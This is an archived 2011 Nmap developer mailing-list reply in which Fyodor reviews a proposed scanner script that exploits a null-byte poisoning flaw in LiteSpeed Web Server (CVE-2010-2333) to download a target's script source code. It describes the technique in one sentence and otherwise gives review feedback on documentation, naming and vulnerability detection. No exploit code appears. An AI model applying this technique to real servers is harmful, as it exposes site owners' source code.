Nmap Development mailing list archives
Re: http-litespeed-sourcecode-download
From: Fyodor <fyodor () insecure org>
Date: Thu, 21 Jul 2011 03:14:05 -0700
On Fri, Jul 15, 2011 at 06:25:32PM -0700, Paulino Calderon wrote:
description = [[ http-litespeed-sourcecode-download.nse exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
Thanks Paulino. Here are some suggestions: o It needs an @output example--that section is currently empty. o Ideally it should try to detect the vulnerability even if the user doesn't specify http-litespeed-sourcecode-download.uri. Otherwise far fewer people will ever make use of this script. Allowing the file to be specified is great for exploiting the bug, but it would be nice to find a way to detect it without requiring that. o I know you are looking for ways to test it out on a real system, so I hope that goes well. o It returns an error if the uri option is not specified, but people do things like "--script vuln" all the time and we don't want an error message showing for each host. Ideally though, the fix will be to do useful things (e.g. detect the vuln) even without requiring the argument. o The name http-litespeed-sourcecode-download is pretty long, and it doesn't even contain "vuln" or the CVE number. But it includes a lot of other good details. So I can't think of any name that I think is clearly better. So this is probably OK. o The @usage example gives the argument name as http-litespeed-sourcecode-download.file, but in the @args section and in the actual code it is .uri rather than .file. o Even though the filename doesn't have a CVE number, the output should probably include it. As I mentioned with http-axis2-dir-traversal, we should aim to report this in a reasonably common way (even though we don't have the special vuln reporting library yet). I hope this helps. Feel free to check it in if you can address these issues and nobody else finds any other ones. Cheers, Fyodor _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- http-litespeed-sourcecode-download Paulino Calderon (Jul 15)
- Re: http-litespeed-sourcecode-download Fyodor (Jul 21)
- Re: http-litespeed-sourcecode-download Paulino Calderon (Jul 24)
- Re: http-litespeed-sourcecode-download Fyodor (Jul 21)